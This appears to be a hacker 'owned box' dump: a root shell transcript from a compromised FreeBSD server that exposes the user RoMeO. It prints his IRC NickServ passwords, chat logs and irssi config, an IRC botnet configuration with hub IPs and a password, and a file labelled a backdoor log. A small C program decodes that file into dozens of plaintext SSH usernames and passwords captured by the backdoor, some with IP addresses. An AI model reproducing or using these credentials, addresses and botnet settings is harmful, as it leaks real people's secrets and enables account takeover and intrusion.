opteron1.ircvps.com,98.124.176.76 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAq20pbQHr81GL9ny66Z9uzGPPmk3dV8P8QgyBi/tHze21Fx30Uh0z7iq8jw0C+Qc+CZdgtIZBSqZrwyEH9m4mORGyST44c2eTH8Bpao++YIWXxu3qPN7L4idVwKfaWygLB4Xo1fJspA1P6NR6WEuJAS3Xtzs8pEo5MPlFQeS/VFv6SPYqURviwJIAGxt/nHDMRGvteQP2/k+m/jCWZy2bP1tbuPMxYqODoesqqtmyAnhjIIWzXtACA6Y7wJCXwSDdgsXYilzdunChYCtoodsad2zrxaR+bi3RQ7xWBAZu8zEfFxbOMDJiFQedWA9mzg4KR0Nn9DZDvXt/jPO/lqOPPQ==
quad1.ircvps.com,89.46.100.252 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAvsQ8ja7kV6D7wZD+jlhi+7DwbqcqB3ejjwPD23ddkQ/DI7GL2hCcdYDAvmLhTS6NOleR3mWXsyDcG8RIUNOjI1tWM/A21p1W9CvPI0bx01kab3iyKhQNe9X+hGkbnm+Hxhg0aBNA0d5yrzNM7Iip1DBKoZE4ZpKxOdrMzZAtYJQIvGQel+EHknF90v6yAuOac+jKBeu23IO6iXAIHbT2y2t4xYzSBwDEctbB57UjcJIkiz5+EvDMfS9BA12CnliyEcN8rdm2L9nKxeczD5TcJT9w4k1hn8KUH6k0Fo7pBVMKS0++OxiWahNUa5kWqFqcdBybMhtaoSr9n63pbFCo1Q==
67.225.142.98 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAyJk4nZcAAMllBRJJHJsGZwzviFMbG4kH8OcoRHeC4nXVH+6qs/R79k1Wn0bW7jx4eOW7CtRqW0xLwGTh1eCth7015qq6ekk55gTtZxWHhr6bmX3spalyW9KikPG4j5OM6MThTUaTcJ+GeFLYjlWXqkvIiTTukAxPo5SgfQXT8Fk=
[root@velocity:/home/romeo]#

[root@velocity:/home/romeo/.irssi]# ls -la 
total 108
drwx------  3 romeo  romeo   512 Jun 17 09:42 ./
drwxr-xr-x  4 romeo  romeo   512 Jun 27 21:56 ../
-rw-------  1 romeo  romeo  4500 Jun 28 02:13 away.log
-rw-r--r--  1 romeo  romeo  9591 Jun 27 22:51 config
-rw-r-----  1 romeo  romeo   584 Jun 17 07:16 config.old
-rw-r-----  1 romeo  romeo  8472 Jun 27 21:56 default.theme
-rw-r--r--  1 romeo  romeo  8466 Feb 20 16:08 fear2.theme
-rw-------  1 romeo  romeo    70 Jun 17 07:31 nickserv.auth
-rw-r--r--  1 romeo  romeo    74 Jun 17 07:31 nickserv.networks
-rw-r--r--  1 romeo  romeo  4667 Jun 27 21:56 pandemonium.theme
drwxr-xr-x  3 romeo  romeo   512 Jun 22 17:50 scripts/
[root@velocity:~]# 

[root@velocity:/home/romeo/.irssi]# cat nickserv.auth 
secchat RoMeO   ve2aZCp3GYoq
bhf     RoMeO   ra7plmyt
tdirc   RoMeO   sidfh928rf783
[root@velocity:~]# 

[root@velocity:/]# cat /usr/home/romeo/.irssi/away.log 
--- Log opened Tue Jun 30 01:08:25 2009
01:23 #bhf: (cc8/connectiong8/:3/RoMeOg) e+
01:34 #bhf: (cc8/connectiong8/:3/RoMeOg) e+
01:42 #bhf: (cc8/HTHg8/:3/RoMeO, romeo, kick this jackass oh romeo?g) e 
02:00 #bhf: (c+c>/connectiong) ethat is a joke RoMeO
--- Log closed Tue Jun 30 04:12:51 2009
--- Log opened Tue Jun 30 19:19:25 2009
19:39 #darkmindz: (cc8/Zer0g8/:3/RoMeO you familiar with Yatra?g) e+
19:44 #darkmindz: (c+c>/Purpleyg) enice RoMeO
19:55 #darkmindz: (c%c>/Biberg) ei dont think that's Romeo
20:00 #darkmindz: (c+c>/Purpleyg) ehow long have you been associated with darkmindz
--- Log closed Tue Jun 30 20:06:56 2009
--- Log opened Tue Jun 30 21:22:55 2009
21:42 #bhf: (c c>/Crooshg) ehttp://romeo.copyandpaste.info/
21:42 #bhf: (c c>/Darkg) eThats still Antisec in the context of self-gain
21:42 #bhf: (c c>/Darkg) eI think theres a legitimate moral standpoint for Antisec
--- Log closed Tue Jun 30 22:17:55 2009
--- Log opened Wed Jul 01 00:59:13 2009
--- Log closed Wed Jul 01 01:00:01 2009
--- Log opened Wed Jul 01 01:00:23 2009
01:00 #bhf: (cc8/connectiong8/:3/RoMeO: he's only blocking all ing) e 
01:00 #bhf: (cc8/HTHg8/:3/RoMeO: raw sockets go below :\g) e+
01:14 #bhf: (cc8/HTHg8/:3/RoMeO: It made sense to me D:g) e+
01:27 #bhf: (c+c>/HTHg) eWhy couldnt Romeo get it that fast D:
01:31 #bhf: (cc8/HTHg8/:3/RoMeO... he didnt get the leet drawing thoughg) e+
01:31 #bhf: (cc8/Darkg8/:3/RoMeOg) e 
01:34 #bhf: (c+c>/HTHg) ehis response:  when you are blocking all out and in i dont see how the fuck are you going to attack an outside box
01:34 #bhf: (cc8/Darkg8/:3/Romeog) e 
01:53 #bhf: (c c>/Darkg) eUsually he said "You're immature and laughable and Antisec is meaningless and e-violent"
01:56 #bhf: (c c>/Darkg) ehttp://www.blackhat-forums.com/topic/6447-underground-is-not-dead/page__view__findpost__p__40605
--- Log closed Wed Jul 01 02:43:40 2009
--- Log opened Wed Jul 01 03:32:17 2009
--- Log closed Wed Jul 01 03:32:22 2009
--- Log opened Wed Jul 01 03:32:24 2009
--- Log closed Wed Jul 01 05:38:09 2009
--- Log opened Wed Jul 01 06:53:32 2009
--- Log closed Wed Jul 01 06:53:36 2009
--- Log opened Wed Jul 01 06:53:44 2009
07:03 #darkmindz: (c&c>/Xiresg) e http://www.blackhat-forums.com/topic/10564-xss-in-wall-ssh-1-putty/
[root@velocity:/]# 


[root@velocity:/home/romeo/.irssi]# cat config
servers = (
  { address = "irc.stealth.net"; chatnet = "IRCNet"; port = "6668"; },
  { address = "irc.efnet.net"; chatnet = "EFNet"; port = "6667"; },
  { 
    address = "irc.undernet.org";
    chatnet = "Undernet";
    port = "6667";
  },
  { address = "irc.dal.net"; chatnet = "DALnet"; port = "6667"; },
  { address = "irc.openprojects.net"; chatnet = "OPN"; port = "6667"; },
  { address = "irc.gnome.org"; chatnet = "GIMPNet"; port = "6667"; },
  { address = "irc.ptlink.net"; chatnet = "PTlink"; port = "6667"; },
  { address = "silc.pspt.fi"; chatnet = "SILC"; port = "706"; },
  {
    address = "irc.securitychat.org";
    chatnet = "secchat";
    port = "6667";
    autoconnect = "yes";
    nick = "RoMeO";
  },
  { 
    address = "irc.blackhat-forums.com";
    chatnet = "bhf";
    port = "6667";
    autoconnect = "yes";
    nick = "RoMeO";
  },
  {
    address = "irc.tdirc.net";
    chatnet = "tdirc";
    port = "6667";
    autoconnect = "yes";
    nick = "RoMeO";
  }
);

chatnets = {
  IRCNet = {
    type = "IRC";
    max_kicks = "4";
    max_modes = "3";
    max_msgs = "5";
    max_whois = "4";
    max_query_chans = "5";
  };
  EFNet = { 
    type = "IRC";
    max_kicks = "4";
    max_modes = "4";
    max_msgs = "3";
  };
  Undernet = {
    type = "IRC";
    max_kicks = "4";
    max_modes = "3";
    max_msgs = "3";
  };
  DALNet = { 
    type = "IRC";
    max_kicks = "4";
    max_modes = "6";
    max_msgs = "3";
  };
  OPN = { type = "IRC"; max_kicks = "4"; max_modes = "4"; max_msgs = "1"; };
  GIMPNet = {
    type = "IRC";
    max_kicks = "4";
    max_modes = "4";
    max_msgs = "3";
  };
  PTLink = {
    type = "IRC";
    max_kicks = "1";
    max_modes = "6";
    max_msgs = "100";
  };
  SILC = { type = "SILC"; };
  secchat = { type = "IRC"; };
  bhf = { type = "IRC"; };
  tdirc = { type = "IRC"; };
};

channels = (

  { name = "#bhf"; chatnet = "bhf"; autojoin = "yes"; },
  { name = "#r00tsecurity"; chatnet = "tdirc"; autojoin = "yes"; },
  { name = "#thedefaced"; chatnet = "tdirc"; autojoin = "yes"; },
  { name = "#zer0zone"; chatnet = "tdirc"; autojoin = "yes"; },
  { name = "#darkmindz"; chatnet = "secchat"; autojoin = "yes"; },
  { name = "#astalavista"; chatnet = "secchat"; autojoin = "yes"; },
  { name = "#kinqpinz"; chatnet = "secchat"; autojoin = "yes"; },
  { name = "#gso-chat"; chatnet = "bhf"; autojoin = "yes"; }
); 

aliases = {
  J = "join";
  WJOIN = "join -window";
  WQUERY = "query -window";
  LEAVE = "part";
  BYE = "quit";
  EXIT = "quit";
  SIGNOFF = "quit";
  DESCRIBE = "action";
  DATE = "time";
  HOST = "userhost";
  LAST = "lastlog";
  SAY = "msg *";
  WI = "whois";
  WII = "whois $0 $0";
  WW = "whowas";
  W = "who";
  N = "names";
  M = "msg";
  T = "topic";
  C = "clear";
  CL = "clear";
  K = "kick";
  KB = "kickban";
  KN = "knockout";
  BANS = "ban";
  B = "ban";
  MUB = "unban *";
  UB = "unban";
  IG = "ignore";
  UNIG = "unignore";
  SB = "scrollback";
  UMODE = "mode $N";
  WC = "window close";
  WN = "window new hide";
  SV = "say Irssi $J ($V) - http://irssi.org/";
  GOTO = "sb goto";
  CHAT = "dcc chat";
  RUN = "SCRIPT LOAD";
  SBAR = "STATUSBAR";
  INVITELIST = "mode $C +I";
};

statusbar = {
  # formats:
  # when using {templates}, the template is shown only if its argument isnt
  # empty unless no argument is given. for example {sb} is printed always,
  # but {sb $T} is printed only if $T isnt empty.

  items = {
    # start/end text in statusbars
    barstart = "{sbstart}";
    barend = "{sbend}";

    # treated "normally", you could change the time/user name to whatever
    time = "{sb $Z}";
    user = "{sb $cumode$N{sbmode $usermode}{sbaway $A}}";

    # treated specially .. window is printed with non-empty windows,
    # window_empty is printed with empty windows
    window = "{sb $winref:$T{sbmode $M}}";
    window_empty = "{sb $winref{sbservertag $tag}}";
    prompt = "{prompt $[.15]T}";
    prompt_empty = "{prompt $winname}";
    topic = " $topic";
    topic_empty = " Irssi v$J - http://irssi.org/help/";

    # all of these treated specially, theyre only displayed when needed
    lag = "{sb Lag: $0-}";
    act = "{sb Act: $0-}";
    more = "-- more --";
  };

  # theres two type of statusbars. root statusbars are either at the top
  # of the screen or at the bottom of the screen. window statusbars are at
  # the top/bottom of each split window in screen.
  default = {
    # the "default statusbar" to be displayed at the bottom of the window.
    # contains all the normal items.
    window = {
      disabled = "no";

      # window, root
      type = "window";
      # top, bottom
      placement = "bottom";
      # number
      position = "1";
      # active, inactive, always
      visible = "active";

      # list of items in statusbar in the display order
      items = {
        barstart = { priority = "100"; };
        time = { };
        user = { };
        window = { };
        window_empty = { };
        lag = { priority = "-1"; };
        act = { priority = "10"; };
        more = { priority = "-1"; alignment = "right"; };
        barend = { priority = "100"; alignment = "right"; };
      };
    };

    # statusbar to use in inactive split windows
    window_inact = {
      type = "window";
      placement = "bottom";
      position = "1";
      visible = "inactive";
      items = {
        barstart = { priority = "100"; };
        window = { };
        window_empty = { };
        more = { priority = "-1"; alignment = "right"; };
        barend = { priority = "100"; alignment = "right"; };
      };
    };

    # we treat input line as yet another statusbar :) Its possible to
    # add other items before or after the input line item.
    prompt = {
      type = "root";
      placement = "bottom";
      # we want to be at the bottom always
      position = "100";
      visible = "always";
      items = {
        prompt = { priority = "-1"; };
        prompt_empty = { priority = "-1"; };
        # treated specially, this is the real input line.
        input = { priority = "10"; };
      };
    };

    # topicbar
    topic = {
      type = "root";
      placement = "top";
      position = "1";
      visible = "always";
      items = {
        barstart = { priority = "100"; };
        topic = { };
        topic_empty = { };
        barend = { priority = "100"; alignment = "right"; };
      };
    };
  };
};
settings = {
  core = {
    real_name = "romeo haxxor"; // "romeo haxxed"
    user_name = "RoMeO";
    nick = "RoMeO";

    timestamp_format = "%H:%M:%S";
    hostname = "absolute.ownage.net"; // absolutely owned..
  };
  "fe-common/core" = {
    autolog = "no";
    autolog_path = "~/irclogs/$tag/$0-%m%y.log";
    show_nickmode_empty = "yes";
    theme = "pandemonium";
    autocreate_own_query = "no";
    autocreate_query_level = "DCCMSGS";
    use_status_window = "no";
    use_msgs_window = "yes";
  };
  "fe-text" = {
    colors = "yes";
    autostick_split_windows = "yes";
    actlist_sort = "refnum";
  };
};
logs = { };
ignores = ( );
keyboard = (
  { key = "meta-1"; id = "change_window"; data = "1"; },
  { key = "meta-2"; id = "change_window"; data = "2"; },
  { key = "meta-3"; id = "change_window"; data = "3"; },
  { key = "meta-4"; id = "change_window"; data = "4"; },
  { key = "meta-5"; id = "change_window"; data = "5"; },
  { key = "meta-6"; id = "change_window"; data = "6"; },
  { key = "meta-7"; id = "change_window"; data = "7"; },
  { key = "meta-8"; id = "change_window"; data = "8"; },
  { key = "meta-9"; id = "change_window"; data = "9"; },
  { key = "meta-0"; id = "change_window"; data = "10"; }
);

hilights = (
  { text = "RoMeO"; nick = "yes"; word = "yes"; },
  { text = "darkmindz"; nick = "yes"; word = "yes"; },
  { text = "antisec"; nick = "yes"; word = "yes"; }, 
  { text = "anti-sec"; nick = "yes"; word = "yes"; },
  { text = "zf0"; nick = "yes"; word = "yes"; },
  { text = "strayfe"; nick = "yes"; word = "yes"; },
  { text = "n3w7yp3"; nick = "yes"; word = "yes"; },
  { text = "copyandpaste"; nick = "yes"; word = "yes"; },
  { text = "blackhat"; nick = "yes"; word = "yes"; },
  { text = "whitehat"; nick = "yes"; word = "yes"; },
  { text = "b0rx"; nick = "yes"; word = "yes"; }
); // I wonder.. zf0?.. Lulz

windows = {
  1 = { };
  2 = { 
    immortal = "yes";
    name = "(msgs)";
    level = "MSGS ACTIONS DCCMSGS";
  };
  3 = {
    items = (
      { 
        type = "CHANNEL";
        chat_type = "IRC";
        name = "#bhf";
        tag = "bhf";
      }
    );
  };
  4 = {
    items = (
      {
        type = "CHANNEL";
        chat_type = "IRC";
        name = "#gso-chat";
        tag = "bhf";
      }
    );
  };
  5 = {
    items = (
      {
        type = "CHANNEL";
        chat_type = "IRC";
        name = "#r00tsecurity";
        tag = "tdirc";
      }
    );
  };
  6 = {
    items = (
      {
        type = "CHANNEL";
        chat_type = "IRC";
        name = "#thedefaced";
        tag = "tdirc";
      }
    );
  };
  7 = {
    items = (
      {
        type = "CHANNEL";
        chat_type = "IRC";
        name = "#zer0zone";
        tag = "tdirc";
      }
    );
  };
  8 = {
    items = (
      {
        type = "CHANNEL";
        chat_type = "IRC";
        name = "#kinqpinz";
        tag = "secchat";
      }
    );
  };
  9 = {
    items = (
      {
        type = "CHANNEL";
        chat_type = "IRC";
        name = "#darkmindz";
        tag = "secchat";
      }
    );
  };
  10 = {
    items = (
      {
        type = "CHANNEL";
        chat_type = "IRC";
        name = "#astalavista";
        tag = "secchat";
      }
    );
  };
};
mainwindows = { 1 = { first_line = "1"; lines = "49"; }; };


[root@velocity:/tmp/...]# cat botnet.conf 
set harryhub "hub 69.42.223.68:7100" ; # the hub ("hubnick ipadress:port")
set harryahub "otis 12.226.117.109:7100" ; # the hub ("althubnick ipadress:port")
set offlinehub 1 ; # run bot in limbomode (1/0) (VERY recomended)
set owner "shoes , rizo" ; # owner(s) ("Jmns")
set botnet_pass "xxlgertg51515150rwf0" ; # just set this to some rand string
set usemsgcmd 0 ; # Enable msg commands (1/0) (not recomended)
source harry.tcl
[root@velocity:/tmp/...]# 

[root@velocity:/]# ls -la
total 129
drwxr-xr-x   22 root  wheel      512 Jun 29 16:00 ./
drwxr-xr-x   22 root  wheel      512 Jun 29 16:00 ../
-rw-r--r--    2 root  wheel      801 Jan 12  2007 .cshrc
drwxr-xr-x    2 root  wheel      512 Jun 29 16:00 .dev/
-rw-r--r--    2 root  wheel      251 Jan 12  2007 .profile
drwxrwxr-x    2 root  operator   512 Apr 12  2007 .snap/
-r--r--r--    1 root  wheel     6196 Jan 12  2007 COPYRIGHT
drwxr-xr-x    2 root  wheel     1024 Apr 16  2007 bin/
drwxr-xr-x    6 root  wheel      512 Apr 16  2007 boot/
drwxr-xr-x    2 root  wheel      512 Apr 12  2007 cdrom/
lrwxr-xr-x    1 root  wheel       10 Apr 12  2007 compat@ -> usr/compat
dr-xr-xr-x    4 root  wheel      512 Dec 31  1969 dev/
drwxr-xr-x    2 root  wheel      512 Apr 12  2007 dist/
-rw-------    1 root  wheel     4096 Apr 16  2007 entropy
drwxr-xr-x   19 root  wheel     2048 Jun 28 21:09 etc/
lrwxrwxrwx    1 root  wheel        8 Apr 12  2007 home@ -> usr/home
drwxr-xr-x    2 root  wheel      512 Apr 12  2007 home2/
-rw-r--r--    1 root  wheel        0 Oct  5  2007 jj.log
lrwxr-xr-x    1 root  wheel       22 Apr 15  2007 kernconf@ -> /usr/src/sys/i386/conf
drwxr-xr-x    3 root  wheel     1024 Nov  5  2008 lib/
drwxr-xr-x    2 root  wheel      512 Apr 16  2007 libexec/
drwxr-xr-x    2 root  wheel      512 Jan 12  2007 media/
drwxr-xr-x    2 root  wheel      512 Jan 12  2007 mnt/
dr-xr-xr-x    2 root  wheel      512 Jan 12  2007 proc/
drwxr-xr-x    2 root  wheel     2560 Nov  5  2008 rescue/
drwxr-xr-x    6 root  wheel      512 Jun 29 08:26 root/
drwxr-xr-x    2 root  wheel     2560 Apr 16  2007 sbin/
lrwxr-xr-x    1 root  wheel       11 Apr 16  2007 sys@ -> usr/src/sys
drwxrwxrwt  103 root  wheel     3072 Jun 29 16:00 tmp/
drwxr-xr-x   24 root  wheel      512 Jun 15 07:35 usr/
drwxr-xr-x   24 root  wheel      512 Jun 15 05:05 var/


[root@velocity:/var/run]# ls -la
total 112
drwxr-xr-x   5 root  wheel      512 Jun 26 21:20 ./
drwxr-xr-x  24 root  wheel      512 Jun 15 05:05 ../
-rw-r--r--   1 root  wheel        0 Jun 25 11:08 a.out
-rw-------   1 root  wheel        0 Jun 25 15:43 as.core
-rw-------   1 root  wheel        3 Jan 27  2008 cron.pid
-rw-r--r--   1 root  wheel        4 Jan 27  2008 devd.pid
srw-rw-rw-   1 root  wheel        0 Jan 27  2008 devd.pipe=
-rw-r--r--   1 root  wheel     5659 Jan 27  2008 dmesg.boot
-rw-------   1 root  wheel        5 Jun 25 08:57 inetd.pid
-r--r--r--   1 root  wheel      245 Jun 23 23:21 ld-elf.so.hints
-r--r--r--   1 root  wheel       67 Jan 27  2008 ld.so.hints
srw-rw-rw-   1 root  wheel        0 Jan 27  2008 log=
srw-------   1 root  wheel        0 Jan 27  2008 logpriv=
drwxr-xr-x   2 bind  bind       512 Jan 12  2007 named/
drwxrwx---   2 root  network    512 Jan 12  2007 ppp/
drwxr-xr-x   2 root  wheel      512 Jan 27  2008 proftpd/
-rw-r--r--   1 root  wheel        4 Jan 27  2008 proftpd.pid
-rw-r--r--   1 root  wheel    14776 Jun 26 20:09 proftpd.scoreboard
-rw-------   1 root  wheel       78 Jan 27  2008 sendmail.pid
-rw-rw-rw-   1 root  wheel     2930 Jun 26 18:08 ssh.old // Backdoor _encrypted_ log file
-rw-r--r--   1 root  wheel        6 Jun 17 18:29 sshd.pid
-rw-------   1 root  wheel        3 Jan 27  2008 syslog.pid
-rw-r--r--   1 root  wheel        0 Jan 27  2008 syslogd.sockets
-rw-r--r--   1 root  wheel     1496 Jun 26 21:31 utmp
[root@velocity:/var/run]# 

[root@velocity:/var/run]# cat ssh.old 
·°°´¶±Ɵ’šŝŠƙ•˜�´¶±Ɵ–’–‘•˜ƎŒŒ˜†ϥ¾¼¸ª¥¹¬�´¶±Ɵ–“š‡Ŷ֞¿°±³¶±º�´¶±Ɵ–“š‡Ŷ֞¿°±³¶±º�´¶±ƟœŠœ“‰š¾žϵ·°°´¶±ƟœŠœ“‰š¾žϵ·°°´¶±Ɵœ—žŒυ’žЎ͋—�´¶±Ɵ†žŽŠ–ŒŜ“Œšš“†̊ʵ·°°´¶±ƟŒ’žŒ—őΘˆ—ύš�´°ª«ƟLJҎ΋Ҏɉ҈ʟœ†œ“šŋЏ³ȵ·°°´°ª«ƟLJҎǍҍ̉҈П“ž˜ś–‘Œ—–‹“–”šž‘ž“–š‘�´°ª«ƟLJҎǍҍ̉҈П“ž˜ś–‘Œ—–‹“–”šž‘ž“–š‘�´°ª«ƟLJҎǍҍ̉҈П“ś–‘Œ—–‹“–”šž‘ž“–š‘�´°ª«ƟLJҎǍҍ̉҈П“ž˜ʼnž‘–‹†І�´°ª«ƟLJҎǍҍ̉҈П“ž˜ʼnž‘–‹†І�´¶±Ɵ–“š‡Ŷ֞¿°±³¶±º�´¶±Ɵ–“š‡Ŷ֞¿°±³¶±º�´¶±Ɵ–“š‡Ŷ֞¿°±³¶±º�´¶±Ɵ’ž‹‹Ņš›žЍ�´¶±Ɵ’ž‹‹Ņš›žЍ�´¶±Ɵ’ž‹‹Ņš›žЍ�´¶±Ɵ’ž‹‹Ņš›žЍ�´¶±Ɵ–“š‡Ŷ֞¿°±³¶±º�´¶±Ɵ–“š‡Ŷ֞¿°±³¶±º�´¶±Ɵ–“š‡Ŷ֞¿°±³¶±º�´¶±Ɵ’ž‹‹Ņš›žЍ�´¶±Ɵ†žŽŠ–ŒŜ“Œšš“†̊ʵ·°°´¶±ƟŒ†œ…ŕš“šŒŠ–Œ�´¶±ƟŒ†œ…ŕš“šŒŠ–Œ�´¶±Ɵ†žŽŠ–ŒŜ“Œšš“†̊ʵ·°°´¶±Ɵ–“š‡Ŷ֞¿°±³¶±º�´¶±Ɵ†žŽŠ–ŒŜ“Œšš“†̊ʵ·°°´¶±Ɵ”ŠžžŞŒ“ŒІΌ�´¶±Ɵ’˜ˆ‹™ő”–ž…�´¶±Ɵ–“š‡Ŷ֞¿°±³¶±º�´¶±Ɵ†žŽŠ–ŒŜ“Œšš“†̊ʵ·°°´¶±Ɵ’ž‹‹Ņš›žЍ�´¶±Ɵ’ž‹‹Ņš›žЍ�´¶±Ɵ’ž‹‹Ņš›žЍ�´¶±ƟŒ‹šŋœ‡’ύύ�´¶±Ɵœž……φʎŜ˅…†΍œ›�´¶±Ɵžŏž“”ž�´¶±Ɵžŏž“”ž�´¶±Ɵ–“š‡Ŷ֞¿°±³¶±º�´¶±Ɵœ—žŒυ’žЎ͋—�´¶±ƟŒ’žŒ—őΘˆ—ύš�´¶±Ɵ”ž‹ŒŒ‹Ŝ—ψۖš�´¶±Ɵ”ž‹ŒŒ‹Ŝ—ψۖš�´¶±Ɵ–’–‘•˜ƎŒŒ˜†ϥ¾¼¸ª¥¹¬�´¶±Ɵ–’–‘•˜ƎŒŒ˜†ϥ¾¼¸ª¥¹¬�´¶±Ɵ“”˜ž…Ƒ½“–‘›ϑ�´¶±Ɵ”ž‹ŒŒ‹Ŝ—ψۖš�´¶±Ɵ”ž‹ŒŒ‹Ŝ—ψۖš�´¶±Ɵ–“š‡Ŷ֞¿°±³¶±º�´¶±Ɵž“š‡ő–…ž‹š�´°ª«ƟχǑϋҍЊҋΟ•Š‘–ƎΌ�´¶±Ɵ–“š‡Ŷ֞¿°±³¶±º�´¶±Ɵ–“š‡Ŷ֞¿°±³¶±º�´¶±Ɵ”ž‹ŒŒ‹Ŝ—ψۖš�´¶±Ɵ”ž‹ŒŒ‹Ŝ—ψۖš�´¶±Ɵ”ž‹ŒŒ‹Ŝ—ψۖš�´¶±Ɵ–“š‡Ŷ֞¿°±³¶±º�´¶±Ɵ–“š‡Ŷ֞¿°±³¶±º�´¶±Ɵœ—žŒυ’žЎ͋—�´¶±Ɵ’ž‹‹Ņš›žЍ�´¶±Ɵ–“š‡Ŷ֞¿°±³¶±º�´¶±Ɵ”ž‹ŒŒ‹Ŝ—ψۖš�´¶±Ɵ”ž‹ŒŒ‹Ŝ—ψۖš�´¶±Ɵ”ž‹ŒŒ‹Ŝ—ψۖš�´¶±Ɵ”ž‹ŒŒ‹Ŝ—ψۖš�´¶±Ɵœ—žŒυ’žЎ͋—�´¶±Ɵ”ž‹ŒŒ‹Ŝ—ψۖš�´¶±Ɵ”ž‹ŒŒ‹Ŝ—ψۖš�´¶±Ɵ–“š‡Ŷ֞¿°±³¶±º�´¶±Ɵ†žŽŠ–ŒŜ“Œšš“†̊ʵ·°°´°ª«ƟχǑϋҍЊҋΟ•Š‘–ƎΌ�´°ª«ƟLJҎ΋Ҏɉ҈ʟœ†œ“šŋЏ³ȵ·°°´¶±Ɵ–“š‡Ŷ֞¿°±³¶±º�´°ª«ƟLJҎǍҍ̉҈Пœ†œ“šŋЏ³ȵ·°°´°ª«ƟLJҎǍҍ̉҈ПŒ’žŒ—őΘˆ—ύš�´°ª«ƟLJҎ΋Ҏɉ҈ʟœ†œ“šŋЏ³ȵ·°°´¶±Ɵ–“š‡Ŷ֞¿°±³¶±º�´°ª«ƟLJҎ΋Ҏɉ҈ʟœ†œ“šŋЏ³ȵ·°°´°ª«ƟχǑϋҍЊҋΟ•Š‘–ƎΌ�´°ª«ƟχǑϋҍЊҋΟ•Š‘–ƎΌ�´°ª«ƟLJҎǍҍ̉҈ПŒ’žŒ—őΘˆ—ύš�´¶±Ɵ–“š‡Ŷ֞¿°±³¶±º�´¶±Ɵ†žŽŠ–ŒŜ“Œšš“†̊ʵ·°°´°ª«ƟȆҋʑϏБΊΟœ†œ“šŋЏ“ȵ·°°´°ª«ƟȆҋʑϏБΊΟœ†œ“šŋЏ³ȵ·°°´¶±Ɵœ—žŒυ’žЎ͋—�´¶±Ɵ–“š‡Ŷ֞¿°±³¶±º�´¶±Ɵ†žŽŠ–ŒŜ“Œšš“†̊ʵ·°°´¶±Ɵ†žŽŠ–ŒŜ“Œšš“†̊ʵ·°°´°ª«ƟʈҍΊҎ̍҆ȟχ̞ˆ‘‹ō´»œӊ˥µ�´°ª«ƟLJҎ΋Ҏɉ҈ʟœ†šŋЏ³ȵ·°°´°ª«ƟȆҋʑϏБΊΟœ†šŋЏ“ȵ·°°´°ª«ƟLJҎ΋Ҏɉ҈ʟœ†œ“šŋЏ“ȵ·°°´°ª«ƟLJҎ΋Ҏɉ҈ʟœ†œ“šŋЏ³ȵ·°°´¶±Ɵ–“š‡Ŷ֞¿°±³¶±º�´¶±Ɵ–“š‡Ŷ֞¿°±³¶±º�´¶±Ɵœ—žŒυ’žЎ͋—�´¶±Ɵ–“š‡Ŷ֞¿°±³¶±º�´°ª«ƟȆҋʑϏБΊΟœ†œ“šŋЏ³ȵ·°°´°ª«ƟʈҍΊҎ̍҆ȟχ̞ˆ‘‹ō´»œӊ˥µ�´¶±Ɵœ—žŒυ’žЎ͋—�´¶±Ɵ–“š‡Ŷ֞¿°±³¶±º�´¶±Ɵ”ŠžžŞŒ“ŒІΌ�´¶±Ɵœ’’Ō”†“–‘͵·°°´¶±Ɵœ—žŒυ’žЎ͋—�´°ª«ƟȆҋʑϏБΊΟœ†œ“šŋϳȵ·°°´°ª«ƟȆҋʑϏБΊΟœ†œ“šŋЏ³ȵ·°°´°ª«ƟȆҋʑϏБΊΟœ†œ“šŋЏ³ȵ·°°´¶±Ɵ–’–‘•˜ƎŒŒ˜†ϥ¾¼¸ª¥¹¬󋈍



[root@velocity:/var/run]# cat lame.c 
#include 

int main(int argc, char *argv[])
{
  FILE *n00bfile;
  unsigned int lamechar;
  if(argc < 2)
          printf("Usage: %s filename\n",argv[0]);
  if((n00bfile = fopen(argv[1],"r"))) {
           while((lamechar = fgetc(n00bfile)) != EOF) {
                            printf("%c",~lamechar);
           }
           fclose(n00bfile);
  }
  return 0;
}

// Let's try out our complex decryption program..

[root@velocity:/var/run]# gcc -o lame lame.c
[root@velocity:/var/run]# rm lame.c 
[root@velocity:/var/run]# ./lame ssh.old 
HOOKIN: romeo:bu9fjogr 
HOOKIN: pimpinjg:1ssgy0ZACGUZFS // Our luvbirdz once again.. This time hidding..:)
HOOKIN: ioplex:I*!@ONLINE
HOOKIN: ioplex:I*!@ONLINE
HOOKIN: cpu:lloverAa1
HOOKIN: cpu:lloverAa1
HOOKIN: chaos1:ma012th
HOOKIN: yaquis:closereply456
HOOKIN: smash:n1gwh0re
HOOKOUT: 98.124.176.76 cycle:t00L8
HOOKOUT: 98.192.246.70 lag:droppinshitlikeanalien
HOOKOUT: 98.192.246.70 lag:droppinshitlikeanalien
HOOKOUT: 98.192.246.70 l:droppinshitlikeanalien
HOOKOUT: 98.192.246.70 lag:vanity09
HOOKOUT: 98.192.246.70 lag:vanity09
HOOKIN: ioplex:I*!@ONLINE
HOOKIN: ioplex:I*!@ONLINE
HOOKIN: ioplex:I*!@ONLINE
HOOKIN: matt:zeda02
HOOKIN: matt:zeda02
HOOKIN: matt:zeda02
HOOKIN: matt:zeda02
HOOKIN: ioplex:I*!@ONLINE
HOOKIN: ioplex:I*!@ONLINE
HOOKIN: ioplex:I*!@ONLINE
HOOKIN: matt:zeda02
HOOKIN: yaquis:closereply456
HOOKIN: psycoz:jelesuis
HOOKIN: psycoz:jelesuis
HOOKIN: yaquis:closereply456
HOOKIN: ioplex:I*!@ONLINE
HOOKIN: yaquis:closereply456
HOOKIN: kruapra:asls0923
HOOKIN: omgwtf:nokiaz
HOOKIN: ioplex:I*!@ONLINE
HOOKIN: yaquis:closereply456
HOOKIN: matt:zeda02
HOOKIN: matt:zeda02
HOOKIN: matt:zeda02
HOOKIN: ste:tcxm1212
HOOKIN: cazz1961:c4zzy1rcd
HOOKIN: apo:parolka
HOOKIN: apo:parolka
HOOKIN: ioplex:I*!@ONLINE
HOOKIN: chaos1:ma012th
HOOKIN: smash:n1gwh0re
HOOKIN: katsst:ch0w$ie
HOOKIN: katsst:ch0w$ie
HOOKIN: pimpinjg:1ssgy0ZACGUZFS
HOOKIN: pimpinjg:1ssgy0ZACGUZFS
HOOKIN: blkgraz:.Blind1.
HOOKIN: katsst:ch0w$ie
HOOKIN: katsst:ch0w$ie
HOOKIN: ioplex:I*!@ONLINE
HOOKIN: alexbb:noizarte
HOOKOUT: 189.14.205.42 junior:123
HOOKIN: ioplex:I*!@ONLINE
